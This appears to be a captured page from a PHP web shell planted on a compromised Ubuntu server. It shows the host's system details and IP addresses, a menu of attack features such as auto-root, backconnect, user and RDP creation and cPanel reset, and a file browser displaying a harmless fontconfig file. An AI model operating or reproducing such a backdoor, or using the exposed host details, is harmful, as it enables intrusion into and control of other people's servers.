Linux quad-clini-stageVM 5.4.0-1109-azure #115~18.04.1-Ubuntu SMP Mon May 22 20:06:37 UTC 2023 x86_64
Apache/2.4.29 (Ubuntu)
: 10.2.0.4 | : 3.145.16.251
Cant Read [ /etc/named.conf ]
7.4.25
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
etc /
fonts /
conf.avail /
[ HOME SHELL ]
Name
Size
Permission
Action
10-antialias.conf
225
B
-rw-r--r--
10-autohint.conf
484
B
-rw-r--r--
10-hinting-full.conf
461
B
-rw-r--r--
10-hinting-medium.conf
463
B
-rw-r--r--
10-hinting-none.conf
461
B
-rw-r--r--
10-hinting-slight.conf
463
B
-rw-r--r--
10-no-sub-pixel.conf
491
B
-rw-r--r--
10-scale-bitmap-fonts.conf
1.96
KB
-rw-r--r--
10-sub-pixel-bgr.conf
489
B
-rw-r--r--
10-sub-pixel-rgb.conf
489
B
-rw-r--r--
10-sub-pixel-vbgr.conf
490
B
-rw-r--r--
10-sub-pixel-vrgb.conf
490
B
-rw-r--r--
10-unhinted.conf
481
B
-rw-r--r--
11-lcdfilter-default.conf
526
B
-rw-r--r--
11-lcdfilter-legacy.conf
524
B
-rw-r--r--
11-lcdfilter-light.conf
522
B
-rw-r--r--
20-unhint-small-dejavu-lgc-san...
874
B
-rw-r--r--
20-unhint-small-dejavu-lgc-san...
864
B
-rw-r--r--
20-unhint-small-dejavu-lgc-ser...
866
B
-rw-r--r--
20-unhint-small-dejavu-sans-mo...
866
B
-rw-r--r--
20-unhint-small-dejavu-sans.co...
856
B
-rw-r--r--
20-unhint-small-dejavu-serif.c...
858
B
-rw-r--r--
20-unhint-small-vera.conf
1.23
KB
-rw-r--r--
25-unhint-nonlatin.conf
3.18
KB
-rw-r--r--
30-cjk-aliases.conf
15.64
KB
-rw-r--r--
30-metric-aliases.conf
12.71
KB
-rw-r--r--
40-nonlatin.conf
5.26
KB
-rw-r--r--
45-generic.conf
3.17
KB
-rw-r--r--
45-latin.conf
6.21
KB
-rw-r--r--
49-sansserif.conf
545
B
-rw-r--r--
50-user.conf
673
B
-rw-r--r--
51-local.conf
189
B
-rw-r--r--
53-monospace-lcd-filter.conf
611
B
-rw-r--r--
57-dejavu-sans-mono.conf
1.47
KB
-rw-r--r--
57-dejavu-sans.conf
1.96
KB
-rw-r--r--
57-dejavu-serif.conf
1.61
KB
-rw-r--r--
58-dejavu-lgc-sans-mono.conf
1.51
KB
-rw-r--r--
58-dejavu-lgc-sans.conf
2.01
KB
-rw-r--r--
58-dejavu-lgc-serif.conf
1.65
KB
-rw-r--r--
60-generic.conf
1.72
KB
-rw-r--r--
60-latin.conf
1.79
KB
-rw-r--r--
64-language-selector-prefer.co...
847
B
-rw-r--r--
65-fonts-persian.conf
9.88
KB
-rw-r--r--
65-khmer.conf
289
B
-rw-r--r--
65-nonlatin.conf
7.59
KB
-rw-r--r--
69-language-selector-ja.conf
819
B
-rw-r--r--
69-language-selector-zh-cn.con...
1.7
KB
-rw-r--r--
69-language-selector-zh-hk.con...
1.51
KB
-rw-r--r--
69-language-selector-zh-mo.con...
1.6
KB
-rw-r--r--
69-language-selector-zh-sg.con...
1.7
KB
-rw-r--r--
69-language-selector-zh-tw.con...
2.07
KB
-rw-r--r--
69-unifont.conf
672
B
-rw-r--r--
70-force-bitmaps.conf
263
B
-rw-r--r--
70-no-bitmaps.conf
263
B
-rw-r--r--
70-yes-bitmaps.conf
77
B
-rw-r--r--
80-delicious.conf
422
B
-rw-r--r--
90-synthetic.conf
1.65
KB
-rw-r--r--
99-language-selector-zh.conf
1.81
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : 20-unhint-small-vera.conf
<?xml version="1.0"?> <!DOCTYPE fontconfig SYSTEM "fonts.dtd"> <fontconfig> <!-- The Bitstream Vera fonts have GASP entries suggesting that hinting be disabled below 8 ppem, but FreeType ignores those, preferring to use the data found in the instructed hints. The initial Vera release didn't include the right instructions in the 'prep' table. Fix this by disabling hinting manually at smaller sizes (< 8ppem) --> <match target="font"> <test name="family" compare="eq" ignore-blanks="true"> <string>Bitstream Vera Sans</string> </test> <test name="pixelsize" compare="less"> <double>7.5</double> </test> <edit name="hinting"> <bool>false</bool> </edit> </match> <match target="font"> <test name="family" compare="eq" ignore-blanks="true"> <string>Bitstream Vera Serif</string> </test> <test name="pixelsize" compare="less"> <double>7.5</double> </test> <edit name="hinting"> <bool>false</bool> </edit> </match> <match target="font"> <test name="family" compare="eq" ignore-blanks="true"> <string>Bitstream Vera Sans Mono</string> </test> <test name="pixelsize" compare="less"> <double>7.5</double> </test> <edit name="hinting"> <bool>false</bool> </edit> </match> </fontconfig>
Close